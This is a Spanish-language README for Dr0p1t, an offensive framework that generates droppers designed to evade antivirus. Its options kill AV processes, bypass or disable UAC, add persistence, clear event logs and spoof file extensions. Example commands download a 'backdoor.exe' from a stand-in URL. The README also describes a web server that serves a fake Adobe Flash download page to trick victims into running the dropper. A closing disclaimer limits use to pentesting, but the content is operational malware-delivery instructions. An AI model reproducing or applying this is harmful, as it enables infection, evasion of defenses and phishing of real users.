
Un framework que crea un dropper sigiloso avanzado que evade la mayoría de los AV y tiene muchos trucos.
¿Alguna vez has oído hablar de los troyanos droppers? En resumen, un dropper es un tipo de malware que descarga otros malware y Dr0p1t te da la oportunidad de crear un dropper sigiloso que evade la mayoría de los AV y tiene un montón de trucos (¡Confía en mí! :D) ;)
+ Propiedades del ejecutable generado:
+ Propiedades del framework:
+ Módulos:
+ Módulos de persistencia:

¡Todavía no está completamente probado! Necesitamos algunos colaboradores y probadores 😄
Usage: Dr0p1t.py Malware_Url [Options]
options:
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-a Add your link to powershell user profile (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--runas Bypass UAC and run your malware as admin
--spoof Spoof the final file to an extension you choose.
--zip Tell Dr0p1t that the malware in the link is compressed as zip
--upx Use UPX to compress the final file.
--nouac Try to disable UAC on victim device
-i Use icon to the final file. Check icons folder.
--noclearevent Tell the framework to not clear the event logs on target machine after finish.
--nocompile Tell the framework to not compile the final file.
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
-q Stay quite ( no banner )
-u Check for updates
-nd Display less output information
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip
La versión recomendada para Python 2 es 2.7.x, la versión recomendada para Python 3 es 3.5.x y no uses 3.6 porque aún no es compatible con PyInstaller
Nota: Debes tener acceso root
Aquí hay una lista de todos los videos oficiales para instalar y usar Dr0p1t Lista de reproducción
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py
Nota: en python 2.7 no tienes pip, así que instálalo primero desde el script get-pip.py [Búscalo en Google]
Nota: El servidor aún está en versión beta y tiene muchas características por agregar y también un mejor diseño [¡Necesito un diseñador para contribuir! :D]
En Linux y Windows es lo mismo después de instalar Dr0p1t siguiendo los pasos mencionados anteriormente, instala los módulos en server_requirements.txt usando pip como:
python -m pip install -r server_requirements.txt
Ahora ejecutemos nuestro script del servidor:
python Dr0p1t_Server.py
Después de ejecutar el script del servidor, comenzará a escuchar todas las conexiones que lleguen al puerto 5000 usando flask.
Ahora para usar el servidor desde tu dispositivo, abre en el navegador ya sea 127.0.0.1:5000 o [Tu IP]:5000.
Para abrirlo desde otros dispositivos en la LAN, abre [Tu IP Local]:5000 y para otros dispositivos en la WAN abre [Tu IP Global]:5000, pero asegúrate primero de haber configurado tu router para reenviar las conexiones del puerto 5000 hacia ti.
Después de abrir la página del servidor, verás un sitio web simple con un diseño sencillo que te pide los datos necesarios Ver capturas de pantalla del servidor
Luego envía los datos, serán verificados a través de algunos procesos, luego se generará el archivo exe y serás redirigido a una página que te indica el enlace de estafa.
Después de ingresar el enlace, verás una estafa para descargar el dropper que por defecto es la página de descarga de Adobe Flash.
Para reemplazar la estafa con la tuya, reemplaza el contenido del archivo "Scam.html" con el tuyo, pero recuerda las variables (No las elimines).

Ver más para Windows Ver más para Linux

Si esta herramienta te ha sido útil, siéntete libre de agradecerme invitándome un café :)
Dr0p1t Framework no se hace responsable por el mal uso y por fines ilegales. ¡Úsalo solo para pruebas de penetración o fines educativos!
Copiar código de este framework o usarlo en otra herramienta es aceptable siempre que menciones de dónde lo obtuviste 😄
Las pull requests siempre son bienvenidas :D